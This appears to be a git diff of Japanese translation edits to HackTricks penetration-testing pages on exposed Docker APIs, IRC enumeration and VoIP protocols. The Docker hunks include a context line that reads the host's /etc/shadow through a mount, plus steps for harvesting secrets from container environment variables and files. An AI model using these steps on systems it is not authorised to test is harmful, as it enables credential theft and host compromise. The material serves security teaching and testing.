Docker APIを列挙するためには、次の例のように`docker`コマンドや`curl`を使用できます。
|
||||
Docker APIを列挙するためには、次の例のように`docker`コマンドや`curl`を使用できることに注意してください:
|
||||
```bash
|
||||
#Using curl
|
||||
curl -s http://open.docker.socket:2375/version | jq #Get version
|
||||
|
@ -160,10 +160,10 @@ docker-init:
|
|||
Version: 0.18.0
|
||||
GitCommit: fec3683
|
||||
```
|
||||
**リモートdocker APIに`docker`コマンドで接続できる場合**、サービスとやり取りするために[**以前に**コメントされた**docker**コマンド**を実行**できます。
|
||||
**リモートdocker APIに`docker`コマンドで接続できる場合**、サービスとやり取りするために[**以前に**コメントされた**docker**コマンド**のいずれかを実行**できます。
|
||||
|
||||
{% hint style="info" %}
|
||||
`export DOCKER_HOST="tcp://localhost:2375"`を使用して、dockerコマンドで`-H`パラメータを使用しないように**する**ことができます。
|
||||
`export DOCKER_HOST="tcp://localhost:2375"`を使用して、dockerコマンドで`-H`パラメータを**使用せずに**済ませることができます。
|
||||
{% endhint %}
|
||||
|
||||
**高速特権昇格**
|
||||
|
@ -231,7 +231,7 @@ cat /mnt/etc/shadow
|
|||
docker ps [| grep <kubernetes_service_name>]
|
||||
docker inspect <docker_id>
|
||||
```
|
||||
**env**(環境変数セクション)をチェックして、秘密情報を見つけることができます:
|
||||
**env**(環境変数セクション)をチェックしてシークレットを見つけることができます:
|
||||
|
||||
- パスワード。
|
||||
- IPアドレス。
|
||||
|
@ -284,10 +284,10 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
|||
|
||||
![](<../.gitbook/assets/image (498).png>)
|
||||
|
||||
#### 疑わしい活動のログ記録
|
||||
#### 疑わしいアクティビティのロギング
|
||||
|
||||
* 実行中のコンテナで疑わしい動作を検出するために[https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco)ツールを使用できます。
|
||||
* 次のチャンクでは、**Falcoがカーネルモジュールをコンパイルして挿入**する方法が示されています。その後、ルールを読み込み、**疑わしい活動を記録**を開始します。この場合、特権コンテナが2つ開始され、そのうち1つが機密マウントを持っていることが検出され、数秒後にコンテナ内でシェルが開かれたことが検出されました。
|
||||
* 次のチャンクでは、**Falcoがカーネルモジュールをコンパイルして挿入**する方法が示されています。その後、ルールを読み込み、**疑わしいアクティビティを記録**し始めます。この場合、特権コンテナが2つ起動され、そのうち1つが機密マウントを持っていること、そして数秒後に1つのコンテナ内でシェルが開かれたことが検出されました。
|
||||
```bash
|
||||
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
|
||||
* Setting up /usr/src links from host
|
||||
|
@ -338,11 +338,11 @@ Dockerを監視するためにauditdを使用できます。
|
|||
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗難型マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -353,14 +353,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使用して、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
|
||||
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
* **HackTricksで会社を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -8,15 +8,15 @@ HackTricksをサポートする他の方法:
|
|||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する
|
||||
* **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、**あなたのハッキングテクニックを共有**する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
|
@ -34,7 +34,7 @@ IRCは、元々**プレーンテキストプロトコル**で、IANAによって
|
|||
|
||||
サーバーに接続するには**ニックネーム**だけが必要です。接続後、サーバーはユーザーのIPに逆DNSルックアップを実行します。
|
||||
|
||||
ユーザーは**オペレーター**と**通常のユーザー**に分かれています。オペレーターは、より多くのアクセス権を得るために**ユーザー名**と**パスワード**が必要で、管理者がトップにいます。
|
||||
ユーザーは**オペレーター**と**通常のユーザー**に分かれています。オペレーターは、より多くのアクセス権を得るために**ユーザー名**と**パスワード**が必要で、管理者が最上位にいます。
|
||||
|
||||
**デフォルトポート:** 194, 6667, 6660-7000
|
||||
```
|
||||
|
@ -52,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
|
|||
```
|
||||
### マニュアル
|
||||
|
||||
ここでは、**ランダムなニックネーム**を使用してIRCに接続してアクセスし、興味深い情報を列挙する方法を示しています。 IRCのさらなるコマンドについては、[こちら](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP)を参照してください。
|
||||
ここでは、**ランダムなニックネーム**を使用してIRCに接続してアクセスし、興味深い情報を列挙する方法を示しています。 IRCのさらなるコマンドについては[こちら](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP)を参照してください。
|
||||
```bash
|
||||
#Connection with random nickname
|
||||
USER ran213eqdw123 0 * ran213eqdw123
|
||||
|
@ -98,11 +98,11 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
|
|||
* `ホスト名を検索中`
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗まれたマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -112,14 +112,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで会社を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -8,17 +8,17 @@ HackTricksをサポートする他の方法:
|
|||
|
||||
- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@carlospolopm**をフォローする🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
- **ハッキングトリックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する**
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
|
||||
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -40,11 +40,11 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
### MGCP(Media Gateway Control Protocol)
|
||||
|
||||
MGCP(Media Gateway Control Protocol)は、RFC 3435で概説された**シグナリング**および**コール** **コントロールプロトコル**です。これは、3つの主要なコンポーネントで構成される中央集権型アーキテクチャで動作します。
|
||||
MGCP(Media Gateway Control Protocol)は、RFC 3435で概説された**シグナリング**および**コール** **コントロールプロトコル**です。これは、次の3つの主要コンポーネントで構成される中央集権型アーキテクチャで動作します:
|
||||
|
||||
1. **コールエージェントまたはメディアゲートウェイコントローラ(MGC)**:MGCPアーキテクチャのマスターゲートウェイは、**メディアゲートウェイの管理と制御**を担当します。通話のセットアップ、変更、終了プロセスを処理します。MGCはMGCPプロトコルを使用してメディアゲートウェイと通信します。
|
||||
2. **メディアゲートウェイ(MG)またはスレーブゲートウェイ**:これらのデバイスは、異なるネットワーク間でデジタルメディアストリームを変換します。例えば、従来の回線交換電話網とパケット交換IPネットワークです。これらはMGCによって管理され、それから受け取ったコマンドを実行します。メディアゲートウェイには、トランスコーディング、パケット化、エコーキャンセルなどの機能が含まれる場合があります。
|
||||
3. **シグナリングゲートウェイ(SG)**:これらのゲートウェイは、異なるネットワーク間でシグナリングメッセージを変換し、従来の電話システム(例:SS7)とIPベースのネットワーク(例:SIPまたはH.323)間でシームレスな通信を可能にします。シグナリングゲートウェイは相互運用性を確保し、異なるネットワーク間で通話制御情報が適切に伝達されることを確認するために重要です。
|
||||
1. **コールエージェントまたはメディアゲートウェイコントローラー(MGC)**:MGCPアーキテクチャのマスターゲートウェイは、**メディアゲートウェイの管理と制御**を担当します。通話の設定、変更、終了プロセスを処理します。 MGCはMGCPプロトコルを使用してメディアゲートウェイと通信します。
|
||||
2. **メディアゲートウェイ(MG)またはスレーブゲートウェイ**:これらのデバイスは、異なるネットワーク間でデジタルメディアストリームを変換します。たとえば、従来の回線交換電話網とパケット交換IPネットワークです。これらはMGCによって管理され、それから受け取ったコマンドを実行します。メディアゲートウェイには、トランスコーディング、パケット化、エコーキャンセルなどの機能が含まれる場合があります。
|
||||
3. **シグナリングゲートウェイ(SG)**:これらのゲートウェイは、異なるネットワーク間でシグナリングメッセージを変換し、従来の電話システム(たとえば、SS7)とIPベースのネットワーク(たとえば、SIPまたはH.323)間でシームレスな通信を可能にします。シグナリングゲートウェイは、相互運用性を確保し、異なるネットワーク間で通話制御情報が適切に伝達されることを確認するために重要です。
|
||||
|
||||
要するに、MGCPは通話制御ロジックをコールエージェントに集約し、メディアおよびシグナリングゲートウェイの管理を簡素化し、通信ネットワークでのスケーラビリティ、信頼性、効率性を向上させます。
|
||||
|
||||
|
@ -52,39 +52,39 @@ MGCP(Media Gateway Control Protocol)は、RFC 3435で概説された**シグ
|
|||
|
||||
Skinny Client Control Protocol(SCCP)は、Cisco Systemsが所有する**プロプライエタリなシグナリングおよびコールコントロールプロトコル**です。これは主に**Cisco Unified Communications Manager**(以前はCallManagerとして知られていました)とCisco IP電話や他のCisco音声およびビデオエンドポイント間の通信に使用されます。
|
||||
|
||||
SCCPは、通話制御サーバーとエンドポイントデバイス間の通信を簡素化する軽量プロトコルです。その名前が「Skinny」であるのは、そのミニマリスティックなデザインと、他のVoIPプロトコル(H.323やSIPなど)と比較して帯域幅要件が少ないためです。
|
||||
SCCPは、通話制御サーバーとエンドポイントデバイス間の通信を簡素化するための軽量プロトコルです。その名前が「Skinny」であるのは、そのミニマリスティックなデザインと、H.323やSIPなどの他のVoIPプロトコルと比較して帯域幅要件が少ないためです。
|
||||
|
||||
SCCPベースのシステムの主要なコンポーネントは次のとおりです:
|
||||
SCCPベースのシステムの主要コンポーネントは次のとおりです:
|
||||
|
||||
1. **コールコントロールサーバー**:通常はCisco Unified Communications Managerで、通話のセットアップ、変更、終了プロセス、通話転送、通話保留などの他の電話機能を管理します。
|
||||
2. **SCCPエンドポイント**:これらは、SCCPを使用して通話制御サーバーと通信するIP電話、ビデオ会議ユニット、または他のCisco音声およびビデオエンドポイントなどのデバイスです。これらはサーバーに登録し、シグナリングメッセージを送受信し、通話処理のためにコールコントロールサーバーからの指示に従います。
|
||||
1. **コールコントロールサーバー**:通常はCisco Unified Communications Managerであり、通話の設定、変更、終了プロセス、通話転送、通話転送、通話保留などの他の電話機能を管理します。
|
||||
2. **SCCPエンドポイント**:これらは、SCCPを使用して通話制御サーバーと通信するIP電話、ビデオ会議ユニット、または他のCisco音声およびビデオエンドポイントなどのデバイスです。これらはサーバーに登録し、シグナリングメッセージを送受信し、通話処理のために通話制御サーバーから提供された指示に従います。
|
||||
3. **ゲートウェイ**:これらのデバイスは、従来の回線交換電話網とパケット交換IPネットワーク間でメディアストリームを変換する責任があります。トランスコーディングやエコーキャンセルなどの追加機能も含まれる場合があります。
|
||||
|
||||
SCCPは、Ciscoのコールコントロールサーバーとエンドポイントデバイス間の簡単で効率的な通信方法を提供します。ただし、SCCPは**プロプライエタリプロトコル**であるため、非Ciscoシステムとの相互運用性が制限される可能性があります。そのような場合には、SIPなどの他の標準VoIPプロトコルの方が適している場合があります。
|
||||
SCCPは、Ciscoの通話制御サーバーとエンドポイントデバイス間の簡単で効率的な通信方法を提供します。ただし、SCCPは**プロプライエタリプロトコル**であるため、非Ciscoシステムとの相互運用性が制限される可能性があります。そのような場合には、SIPなどの他の標準VoIPプロトコルの方が適している場合があります。
|
||||
|
||||
### H.323
|
||||
|
||||
H.323は、IPベースのネットワークなどのパケット交換ネットワークを介した音声、ビデオ、データ会議を含むマルチメディア通信のための**プロトコルスイート**です。国際電気通信連合(ITU-T)によって開発され、マルチメディア通信セッションを管理する包括的なフレームワークを提供します。
|
||||
H.323は、IPベースのネットワークなどのパケット交換ネットワークを介した音声、ビデオ、データ会議を含むマルチメディア通信のための**プロトコルスイート**です。これは、国際電気通信連合(ITU-T)によって開発され、マルチメディア通信セッションを管理する包括的なフレームワークを提供します。
|
||||
|
||||
H.323スイートの主要なコンポーネントには次のものがあります:
|
||||
H.323スイートの主要コンポーネントには次のものがあります:
|
||||
|
||||
1. **端末**:IP電話、ビデオ会議システム、ソフトウェアアプリケーションなど、H.323をサポートし、マルチメディア通信セッションに参加できるエンドポイントデバイスです。
|
||||
2. **ゲートウェイ**:これらのデバイスは、従来の回線交換電話網とパケット交換IPネットワーク間でメディアストリームを変換し、H.323と他の通信システムとの間で相互運用性を実現します。トランスコーディングやエコーキャンセルなどの追加機能も含まれる場合があります。
|
||||
3. **ゲートキーパー**:これらはH.323ネットワークで通話制御および管理サービスを提供するオプションのコンポーネントです。アドレス変換、帯域幅管理、アドミッション制御などの機能を実行し、ネットワークリソースを管理および最適化するのに役立ちます。
|
||||
4. **マルチポイントコントロールユニット(MCU)**:これらのデバイスは、複数のエンドポイントからのメディアストリームを管理およびミックスすることで、マルチポイント会議を容易にします。MCUは、ビデオレイアウト制御、音声アクティブスイッチング、連続プレゼンスなどの機能を可能にし、複数の参加者を持つ大規模な会議を開催できるようにします。
|
||||
3. **ゲートキーパー**:これらは、H.323ネットワークで通話制御および管理サービスを提供するオプションのコンポーネントです。アドレス変換、帯域幅管理、アドミッション制御などの機能を実行し、ネットワークリソースを管理および最適化するのに役立ちます。
|
||||
4. **マルチポイントコントロールユニット(MCU)**:これらのデバイスは、複数のエンドポイントからのメディアストリームを管理およびミックスすることで、マルチポイント会議を容易にします。MCUには、ビデオレイアウト制御、音声アクティブスイッチング、連続プレゼンスなどの機能があり、複数の参加者を持つ大規模な会議を開催することが可能です。
|
||||
|
||||
H.323は、音声およびビデオコーデック、通話転送、通話転送、通話保留、通話待ちなどの他の補助サービスをサポートしています。VoIPの初期に広く採用されていましたが、H.323はより現代的で柔軟なプロトコルである**Session Initiation Protocol (SIP)**に徐々に置き換えられており、より良い相互運用性と簡単な実装を提供しています。ただし、H.323は多くのレガシーシステムで使用され続けており、さまざまな機器ベンダーによってサポートされています。
|
||||
H.323は、音声およびビデオコーデック、通話転送、通話転送、通話保留、通話待ちなどの他の補助サービスをサポートしています。VoIPの初期に広く採用されていましたが、より現代的で柔軟なプロトコルである**Session Initiation Protocol (SIP)**に徐々に置き換えられており、SIPはより良い相互運用性と簡単な実装を提供しています。ただし、H.323は多くのレガシーシステムで使用され続けており、さまざまな機器ベンダーによってサポートされています。
|
||||
|
||||
### IAX(Inter Asterisk eXchange)
|
||||
|
||||
IAX(Inter-Asterisk eXchange)は、Asterisk PBX(プライベートブランチ交換)サーバーと他のVoIPデバイス間の通信に主に使用される**シグナリングおよびコールコントロールプロトコル**です。AsteriskオープンソースPBXソフトウェアの作成者であるMark Spencerによって、SIPやH.323などの他のVoIPプロトコルに代わるものとして開発されました。
|
||||
IAX(Inter-Asterisk eXchange)は、Asterisk PBX(プライベートブランチ交換)サーバーと他のVoIPデバイス間の通信に主に使用される**シグナリングおよびコールコントロールプロトコル**です。これは、AsteriskオープンソースPBXソフトウェアの作成者であるMark Spencerによって、SIPやH.323などの他のVoIPプロトコルに代わるものとして開発されました。
|
||||
|
||||
IAXは**シンプルさ、効率性、実装の容易さ**で知られています。IAXの主な特徴には次のものがあります:
|
||||
IAXは、その**シンプルさ、効率性、実装の容易さ**で知られています。IAXの主な特徴には次のものがあります:
|
||||
|
||||
1. **単一のUDPポート**:IAXは、シグナリングとメディアトラフィックの両方に単一のUDPポート(4569)を使用するため、ファイアウォールとNATトラバーサルを簡素化し、さまざまなネットワーク環境での展開を容易にします。
|
||||
2. **バイナリプロトコル**:SIPなどのテキストベースのプロトコルとは異なり、IAXはバイナリプロトコルであり、帯域幅の消費を削減し、シグナリングおよびメディアデータの送信により効率的にします。
|
||||
3. **トランキング**:IAXはトランキングをサポートし、複数の通話を単一のネットワーク接続に組み合わせることで、オーバーヘッドを削減し、帯域幅の利用を向上させます。
|
||||
4. **ネイティブ暗号化**:IAXには、RSAなどの鍵交換およびAESなどのメディア暗号化に使用される暗号化の組み込みサポートがあり、エンドポイント間の安全な通信を提供します。
|
||||
4. **ネイティブ暗号化**:IAXには、RSAをキー交換に、AESをメディア暗号化に使用するなど、エンドポイント間の安全な通信を提供する暗号化の組み込みサポートがあります。
|
||||
5. **ピアツーピア通信**:IAXは、中央サーバーなしでエンドポイント間の直接通信に使用でき、よりシンプルで効率的な通話ルーティングを実現します。
|
||||
|
||||
利点がある一方で、IAXにはAsteriskエコシステムへの主な焦点や、SIPなどのより確立されたプロトコルと比較しての普及度の低さなどの制限があります。その結果、IAXは非Asteriskシステムやデバイスとの相互運用性にとって最適な選択肢ではないかもしれません。ただし、Asterisk環境内で作業している場合、IAXはVoIP通信のための堅牢で効率的なソリューションを提供します。
|
||||
|
@ -97,13 +97,13 @@ SDP(Session Description Protocol)は、IPネットワーク上での音声
|
|||
SDPの主要な要素には次のものがあります:
|
||||
|
||||
1. **セッション情報**:SDPは、セッション名、セッションの説明、開始時間、終了時間など、マルチメディアセッションの詳細を記述します。
|
||||
2. **メディアストリーム**:SDPは、メディアタイプ(オーディオ、ビデオ、またはテキスト)、輸送プロトコル(例:RTPまたはSRTP)、およびメディアフォーマット(コーデック情報など)など、メディアストリームの特性を定義します。
|
||||
2. **メディアストリーム**:SDPは、メディアタイプ(オーディオ、ビデオ、またはテキスト)、トランスポートプロトコル(例:RTPまたはSRTP)、およびメディアフォーマット(コーデック情報など)など、メディアストリームの特性を定義します。
|
||||
3. **接続情報**:SDPは、メディアを送信または受信するためのネットワークアドレス(IPアドレス)とポート番号に関する情報を提供します。
|
||||
4. **属性**:SDPは、セッションやメディアストリームに関する追加のオプション情報を提供するために属性の使用をサポートします。属性は、暗号化キー、帯域幅要件、またはメディア制御メカニズムなど、さまざまな機能を指定するために使用できます。
|
||||
|
||||
SDPは通常、次のプロセスで使用されます:
|
||||
|
||||
1. 開始する側が、提案されたマルチメディアセッションのSDP説明を作成します。これには、メディアストリームとその属性の詳細が含まれます。
|
||||
1. 開始する側が、提案されたマルチメディアセッションのSDP説明を作成し、メディアストリームとその属性の詳細を含めます。
|
||||
2. SDP説明が受信側に送信され、通常はSIPやRTSPなどのシグナリングプロトコルメッセージに埋め込まれます。
|
||||
3. 受信側はSDP説明を処理し、その機能に基づいて、提案されたセッションを受け入れたり、拒否したり、変更したりすることがあります。
|
||||
4. 最終的なSDP説明が、シグナリングプロトコルメッセージの一部として開始する側に送信され、交渉プロセスが完了します。
|
||||
|
@ -112,9 +112,9 @@ SDPのシンプルさと柔軟性により、さまざまな通信システム
|
|||
|
||||
### RTP / RTCP / SRTP / ZRTP
|
||||
|
||||
1. **RTP(Real-time Transport Protocol)**:RTPは、オーディオやビデオデータなどのリアルタイムメディアをIPネットワーク上で配信するために設計されたネットワークプロトコルです。**IETF**によって開発され、**RFC 3550**で定義されています。RTPは、**シンクロナイゼーション**、**シーケンス化**、および**タイムスタンプ**のメカニズムを提供し、メディアストリームのスムーズでタイムリーな再生を確保します。
|
||||
2. **RTCP(Real-time Transport Control Protocol)**:RTCPは、RTPの補助プロトコルであり、メディアストリームの品質監視を行い、その伝送に関するフィードバックを提供するために使用されます。RTPと同じ**RFC 3550**で定義されており、RTCPは**RTPセッションの参加者間で定期的に制御パケットを交換**します。パケット損失、ジッター、ラウンドトリップタイムなどの情報を共有し、ネットワークの状況を診断し適応することで、全体的なメディア品質を向上させます。
|
||||
3. **SRTP(Secure Real-time Transport Protocol)**:SRTPは、メディアストリームの**暗号化**、**メッセージ認証**、および**リプレイ保護**を提供するRTPの拡張機能であり、機密性の高いオーディオやビデオデータの安全な伝送を確保します。**RFC 3711**で定義されており、SRTPは暗号化にAESなどの暗号アルゴリズム、メッセージ認証にHMAC-SHA1などの暗号アルゴリズムを使用します。SRTPは、多くの場合、SIP over TLSなどのセキュアなシグナリングプロトコルと組み合わせて使用され、マルチメディア通信におけるエンドツーエンドのセキュリティを提供します。
|
||||
4. **ZRTP(Zimmermann Real-time Transport Protocol)**:ZRTPは、RTPメディアストリームの**エンドツーエンドの暗号化**を提供する暗号鍵合意プロトコルです。PGPの作成者であるPhil Zimmermannによって開発され、**RFC 6189**で説明されています。シグナリングプロトコルに依存するSRTPとは異なり、ZRTPはシグナリングプロトコルとは独立して動作するように設計されています。通信する各当事者の間で共有秘密を確立するために**Diffie-Hellman鍵交換**を使用し、事前の信頼や公開鍵インフラストラクチャ(PKI)を必要とせずに動作します。ZRTPには、**中間者攻撃に対する保護**として**Short Authentication Strings(SAS)**などの機能も含まれています。
|
||||
1. **RTP(Real-time Transport Protocol)**:RTPは、オーディオやビデオデータ、または他のリアルタイムメディアをIPネットワーク上で配信するために設計されたネットワークプロトコルです。**IETF**によって開発され、**RFC 3550**で定義されています。RTPは、**シンクロナイゼーション**、**シーケンス**、および**タイムスタンプ**のメカニズムを提供し、メディアストリームの**スムーズでタイムリーな再生**を確保します。
|
||||
